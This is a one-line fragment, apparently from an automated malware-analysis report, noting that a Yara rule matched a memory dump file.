Source: Yara match File source: 00000000.00000002.2315834889.0000000002D58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY